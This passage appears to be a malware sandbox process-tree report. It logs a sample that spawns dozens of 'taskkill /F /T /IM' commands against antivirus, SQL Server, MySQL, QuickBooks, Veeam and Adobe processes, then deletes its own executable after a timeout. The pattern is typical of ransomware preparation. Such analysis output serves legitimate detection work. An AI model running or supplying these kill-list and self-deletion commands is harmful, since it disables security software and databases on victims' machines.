    PID:1604  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM MsDtSrvr*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:1732  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM java*
    PID:1840  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM java*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:1580  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM 360se*
    PID:1596  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM 360se*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:268  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM 360doctor*
    PID:1552  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM 360doctor*
      - Suspicious use of AdjustPrivilegeToken
  PID:1852  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM wdswfsafe*
    PID:2016  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM wdswfsafe*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:1976  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM fdhost*
    PID:1112  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM fdhost*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  PID:1988  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM GDscan*
    PID:1472  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM GDscan*
      - Suspicious use of AdjustPrivilegeToken
  PID:1892  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM ZhuDongFangYu*
    PID:1032  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM ZhuDongFangYu*
      - Kills process with taskkill
  PID:1464  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM QBDBMgrN*
    PID:1804  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM QBDBMgrN*
  PID:740  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM mysqld*
    PID:1232  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM mysqld*
      - Kills process with taskkill
  PID:1800  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM AutodeskDesktopApp*
    PID:1620  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM AutodeskDesktopApp*
      - Kills process with taskkill
  PID:1756  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM acwebbrowser*
    PID:672  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM acwebbrowser*
      - Kills process with taskkill
  PID:1624  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM Creative Cloud*
    PID:1932  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM Creative Cloud*
      - Kills process with taskkill
  PID:1880  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM Adobe Desktop Service*
    PID:1984  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM Adobe Desktop Service*
      - Kills process with taskkill
  PID:980  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM CoreSync*
    PID:1908  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM CoreSync*
      - Kills process with taskkill
  PID:1992  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM Adobe CEF Helper*
    PID:1888  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM Adobe CEF Helper*
      - Kills process with taskkill
  PID:2028  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM node*
    PID:2012  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM node*
      - Kills process with taskkill
  PID:608  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM AdobeIPCBroker*
    PID:1316  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM AdobeIPCBroker*
      - Kills process with taskkill
  PID:1392  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM sync-taskbar*
    PID:1268  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM sync-taskbar*
      - Kills process with taskkill
  PID:1540  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM sync-worker*
    PID:884  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM sync-worker*
      - Kills process with taskkill
  PID:548  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM InputPersonalization*
    PID:788  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM InputPersonalization*
      - Kills process with taskkill
  PID:1356  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM AdobeCollabSync*
    PID:1788  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM AdobeCollabSync*
      - Kills process with taskkill
  PID:1572  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM BrCtrlCntr*
    PID:1768  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM BrCtrlCntr*
  PID:1580  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM BrCcUxSys*
    PID:1944  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM BrCcUxSys*
      - Kills process with taskkill
  PID:2040  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM SimplyConnectionManager*
    PID:2016  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM SimplyConnectionManager*
      - Kills process with taskkill
  PID:512  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM Simply.SystemTrayIcon*
    PID:1168  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM Simply.SystemTrayIcon*
      - Kills process with taskkill
  PID:1404  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM fbguard*
    PID:2012  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM fbguard*
  PID:1452  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM fbserver*
    PID:1316  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM fbserver*
  PID:380  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM ONENOTEM*
    PID:1268  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM ONENOTEM*
      - Kills process with taskkill
  PID:804  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM wrapper*
    PID:884  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM wrapper*
      - Kills process with taskkill
  PID:1276  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM DefWatch*
    PID:1628  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM DefWatch*
      - Kills process with taskkill
  PID:1816  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM ccEvtMgr*
    PID:1784  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM ccEvtMgr*
      - Kills process with taskkill
  PID:1776  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM ccSetMgr*
    PID:1632  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM ccSetMgr*
  PID:1916  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM SavRoam*
    PID:1524  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM SavRoam*
      - Kills process with taskkill
  PID:1852  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM Sqlservr*
    PID:1252  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM Sqlservr*
  PID:2020  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM sqlagent*
    PID:1872  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM sqlagent*
  PID:272  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM sqladhlp*
    PID:2028  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM sqladhlp*
      - Kills process with taskkill
  PID:1340  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM Culserver*
    PID:1052  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM Culserver*
  PID:912  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM RTVscan*
    PID:1392  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM RTVscan*
  PID:1796  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM sqlbrowser*
    PID:1036  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM sqlbrowser*
      - Kills process with taskkill
  PID:1236  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM SQLADHLP*
    PID:548  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM SQLADHLP*
      - Kills process with taskkill
  PID:1800  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM QBIDPService*
    PID:1360  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM QBIDPService*
      - Kills process with taskkill
  PID:1532  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
    PID:672  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM Intuit.QuickBooks.FCS*
  PID:1552  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM QBCFMonitorService*
    PID:1580  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM QBCFMonitorService*
      - Kills process with taskkill
  PID:1936  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM sqlwriter*
    PID:2040  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM sqlwriter*
      - Kills process with taskkill
  PID:1992  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM msmdsrv*
    PID:512  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM msmdsrv*
      - Kills process with taskkill
  PID:1896  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM tomcat6*
    PID:1404  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM tomcat6*
  PID:1488  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM zhudongfangyu*
    PID:1988  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM zhudongfangyu*
      - Kills process with taskkill
  PID:520  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM vmware-usbarbitator64*
    PID:380  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM vmware-usbarbitator64*
      - Kills process with taskkill
  PID:1280  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM vmware-converter*
    PID:804  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM vmware-converter*
      - Kills process with taskkill
  PID:1644  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM dbsrv12*
    PID:1760  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM dbsrv12*
      - Kills process with taskkill
  PID:1848  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM dbeng8*
    PID:1528  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM dbeng8*
      - Kills process with taskkill
  PID:1572  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    PID:1932  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM MSSQL$MICROSOFT##WID*
      - Kills process with taskkill
  PID:1912  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
    PID:1916  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM MSSQL$VEEAMSQL2012*
      - Kills process with taskkill
  PID:1612  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
    PID:980  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
      - Kills process with taskkill
  PID:1060  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM SQLBrowser*
    PID:2024  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM SQLBrowser*
      - Kills process with taskkill
  PID:820  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM SQLWriter*
    PID:272  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM SQLWriter*
      - Kills process with taskkill
  PID:832  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM FishbowlMySQL*
    PID:608  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM FishbowlMySQL*
  PID:1820  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    PID:912  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM MSSQL$MICROSOFT##WID*
      - Kills process with taskkill
  PID:1812  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM MySQL57*
    PID:1608  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM MySQL57*
  PID:1276  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
    PID:1236  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
      - Kills process with taskkill
  PID:1732  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM MSSQLServerADHelper100*
    PID:1800  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM MSSQLServerADHelper100*
      - Kills process with taskkill
  PID:1880  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
    PID:1532  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
      - Kills process with taskkill
  PID:268  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM msftesql-Exchange*
    PID:468  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM msftesql-Exchange*
  PID:1856  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
    PID:2008  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
      - Kills process with taskkill
  PID:512  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*
    PID:1496  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM MSSQL$SBSMONITORING*
      - Kills process with taskkill
  PID:1404  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*
    PID:2032  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM MSSQL$SHAREPOINT*
      - Kills process with taskkill
  PID:1988  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
    PID:1340  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
  PID:380  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
    PID:1400  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
      - Kills process with taskkill
  PID:804  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*
    PID:1804  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM SQLAgent$SBSMONITORING*
      - Kills process with taskkill
  PID:1760  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*
    PID:740  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM SQLAgent$SHAREPOINT*
  PID:1528  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM QBFCService*
    PID:1356  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM QBFCService*
      - Kills process with taskkill
  PID:1932  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /C taskkill /F /T /IM QBVSS*
    PID:1556  C:\Windows\SysWOW64\taskkill.exe  cmdline: taskkill /F /T /IM QBVSS*
      - Kills process with taskkill
  PID:656  C:\Windows\SysWOW64\cmd.exe  cmdline: "C:\Windows\System32\cmd.exe" /C timeout /T 15 /NOBREAK && del "C:\Users\Admin\AppData\Local\Temp\79385ed97732aee0036e67824de18e28.exe" /F
    - Deletes itself
    PID:672  C:\Windows\SysWOW64\timeout.exe  cmdline: timeout /T 15 /NOBREAK
      - Delays execution with timeout.exe
PID:1500  C:\Windows\system32\vssvc.exe  cmdline: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken